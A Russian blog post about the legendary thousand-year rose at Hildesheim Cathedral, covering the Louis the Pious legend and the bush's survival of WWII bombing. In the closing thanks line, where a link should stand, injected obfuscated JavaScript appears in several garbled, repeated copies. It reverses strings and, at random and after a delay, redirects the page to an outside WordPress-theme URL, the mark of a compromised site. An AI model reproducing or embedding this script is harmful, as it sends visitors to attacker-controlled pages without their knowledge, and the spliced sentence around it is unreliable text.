Самая древняя роза

А знаете ли вы, что в немецком городе Хильдесхайме возле Собора Вознесения Святой Марии (по-другому он еще известен как Хильдесхаймский собор) растет роза, которой по легенде уже более 1000 лет. Ее так и называют – «тысячелетний розарий», а легенда утверждает, что растет там роза с 815 года. Именно в этом году, согласно преданию, Людовик Благочестивый (из династии Каролингов), находясь на охоте, велел отслужить мессу. С этой целью на куст дикой розы повесили реликварий, посвященный Богоматери. После мессы, однако, снять с куста реликварий не удалось. Благочествый Людовик расценил это не иначе как знак и епископскую кафедру решил основать именно в Хильдесхайме, а не в Эльце, как планировал раньше. Собор был посвящен Марии – ее символом как раз являлась роза.

Реальный возраст той розы, которую мы можем видеть в Хильдесхайме сегодня, составляет не менее 400 лет. Она пережила даже жестокие бомбардировки Второй мировой войны, когда была серьезно повреждена. Однако бомбы не задели корни, поэтому через несколько лет древний и загадочный цветок зацвел снова.

Спасибо Victobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toria за $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torina.ru/cat/p689_koroleva_tsvetobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tov” target=”_blank” rel=”noopener”>викторину о розах, которая и натолкнула нас на идею этого интересного факта.

Источники: Wikipedia (Хильдесхаймский собор).
ГерманияЕвропаФлораЦветы
Comments (4)
Add Comment